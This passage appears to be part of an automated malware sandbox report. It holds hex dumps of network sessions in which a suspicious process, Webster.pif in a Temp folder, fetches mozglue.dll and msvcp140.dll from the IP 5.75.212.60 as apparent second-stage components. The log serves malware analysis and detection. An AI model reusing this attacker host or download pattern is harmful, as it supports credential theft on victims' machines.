                                                                                2024-07-26 15:54:42 UTC16384INData Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f
                                                                                Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                2024-07-26 15:54:42 UTC16384INData Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89
                                                                                Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                2024-07-26 15:54:42 UTC16384INData Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00
                                                                                Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                2024-07-26 15:54:42 UTC16384INData Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7
                                                                                Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                2024-07-26 15:54:42 UTC16384INData Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0
                                                                                Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                                2024-07-26 15:54:42 UTC16384INData Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8
                                                                                Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                                2024-07-26 15:54:42 UTC16384INData Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5
                                                                                Data Ascii: ,0<48%8A)$


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.6641795.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:44 UTC241OUTGET /mozglue.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:44 UTC260INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:44 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 608080
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:44 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes
                                                                                2024-07-26 15:54:44 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46
                                                                                Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPF
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff
                                                                                Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85
                                                                                Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b
                                                                                Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc
                                                                                Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9
                                                                                Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89
                                                                                Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83
                                                                                Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                2024-07-26 15:54:44 UTC16384INData Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0
                                                                                Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.6641805.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:46 UTC242OUTGET /msvcp140.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:46 UTC260INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:46 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 450024
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:46 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes
                                                                                2024-07-26 15:54:46 UTC16124INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                2024-07-26 15:54:46 UTC16384INData Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72
                                                                                Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
                                                                                2024-07-26 15:54:46 UTC16384INData Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff
                                                                                Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
